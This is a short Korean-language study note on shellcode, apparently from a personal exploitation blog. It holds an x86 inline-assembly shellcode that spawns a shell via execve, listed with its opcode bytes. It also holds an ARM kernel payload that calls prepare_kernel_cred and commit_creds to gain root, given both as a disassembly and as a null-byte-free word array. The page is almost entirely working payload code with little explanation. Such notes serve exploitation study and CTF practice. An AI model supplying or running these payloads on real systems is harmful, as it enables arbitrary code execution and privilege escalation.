Shellcode
http://shell-storm.org/shellcode/
NOP-like NOP는 다음과 같은 방식으로도 만들 수 있다.
1
2
mov %eax, %eax
#1 peda
#2 pwntools
#3 msf
x86
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void main(){
\_\_asm\_\_ \_\_volatile\_\_(
"xor %eax, %eax \n\t" 31 c0
"push %eax \n\t" 50
"push $0x... \n\t" 68 ...
"mov %esp, %ebx \n\t" 89 e3
"push %eax \n\t" 50
"push %ebx \n\t" 53
"mov %esp, %ecx \n\t" 89 e1
"mov %eax, %edx \n\t" 89 c2
"mov $0xb, %al \n\t" b0 0b
"int $0x80 \n\t" cd 80
);
}
arm [ setuid(0) ]
arm mode / Thumb mode가 있다는 것에 주의.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
00008054 <\_start>:
8054: e92d4000 push {lr}
8058: e1a00000 mov r0, r0
805c: e59f200c ldr r2, [pc, #12] ; 8070 <prepare\_kernel\_cred\_addr>
8060: e12fff32 blx r2
8064: e59f2008 ldr r2, [pc, #8] ; 8074 <commit\_creds\_addr>
8068: e12fff32 blx r2
806c: e8bd8000 pop {pc}
00008070 <prepare\_kernel\_cred\_addr>:
8070: deadbeef
00008074 <commit\_creds\_addr>:
8074: cafebebe
// get rid of 0x00
unsigned int sc[] = {
0xe52de004, // or 0xe92d4000,
0xe3a00c01, // mov r0, #100
0xe2400c01, // sub r0, #100
0xe59f200c,
0xe12fff32,
0xe59f2008,
0xe12fff32,
0xe49df004, // or 0xe8bd8000,
0xdeadbeef,
0xcafebebe
};
This post is licensed under CC BY 4.0 by the author.